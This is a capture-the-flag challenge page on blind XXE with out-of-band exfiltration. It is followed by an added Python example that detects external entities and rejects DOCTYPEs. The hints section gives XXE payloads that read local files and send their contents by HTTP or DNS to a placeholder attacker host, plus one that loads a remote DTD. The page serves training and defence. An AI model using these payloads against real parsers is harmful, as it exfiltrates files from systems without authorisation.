Easy
150 Points
Blind XXE - Out-of-Band Exfiltration
Challenge Description
This XML parser is vulnerable to XXE, but doesn't reflect the entity values in the response. You need to use out-of-band (OOB) techniques to exfiltrate data to your controlled server.
Objective: Use blind XXE techniques to exfiltrate the flag via HTTP callbacks or DNS lookups. The flag format is FLAG{...}
Configuration
This simulates your callback server that will receive exfiltrated data.
XML Parser (Blind - No Reflection)
Example Blind XXE Payloads
(ATTACKER = your server)
HTTP Callback Log
DNS Lookup Log
Submit Flag
Hints
-10% per hint
OOB Techniques
HTTP Exfiltration:
<!ENTITY % data SYSTEM "file:///secret">
<!ENTITY % exfil SYSTEM "http://attacker/?d=%data;">
DNS Exfiltration:
<!ENTITY % data SYSTEM "file:///etc/hostname">
<!ENTITY % dns SYSTEM "http://%data;.attacker.com">
External DTD:
<!ENTITY % remote SYSTEM "http://attacker/evil.dtd">
%remote;
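A defender-side check for the declarations listed above, as an added example that is not part of the original challenge page: it uses Python's standard-library expat bindings to list external entity declarations without fetching them, and refuses any untrusted document that carries a DOCTYPE. The sample document is constructed from the page's HTTP exfiltration lines, and the function and class names are hypothetical.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

# Constructed sample: the page's HTTP exfiltration declarations inside a DOCTYPE.
BLIND_XXE = b"""<!DOCTYPE r [
  <!ENTITY % data SYSTEM "file:///secret">
  <!ENTITY % exfil SYSTEM "http://attacker/?d=%data;">
]>
<r>x</r>"""
BENIGN = b"<order><id>42</id></order>"


class DTDRejected(ValueError):
    """Raised when untrusted XML carries a DOCTYPE."""


def external_entities(data):
    """Return (kind, name, system_id) for each external entity declared.

    No ExternalEntityRefHandler is installed and parameter-entity parsing is
    left at its default (off), so expat reports the declarations but does not
    read the file or contact the URL.
    """
    found = []

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None:  # internal entities have no system identifier
            found.append(("parameter" if is_param else "general", name, system_id))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity
    parser.Parse(data, True)
    return found


def parse_untrusted(data):
    """Parse XML only if it has no DOCTYPE; blind XXE needs one to declare entities."""
    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DTDRejected("DOCTYPE not allowed in untrusted XML")

    probe = expat.ParserCreate()
    probe.StartDoctypeDeclHandler = on_doctype
    probe.Parse(data, True)  # raises DTDRejected before any entity is processed
    return ET.fromstring(data)


if __name__ == "__main__":
    for finding in external_entities(BLIND_XXE):
        print(finding)
```

Because the response never reflects entity values, logging the output of `external_entities` for rejected requests gives responders the file paths and callback hosts that were targeted.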
Learning Resources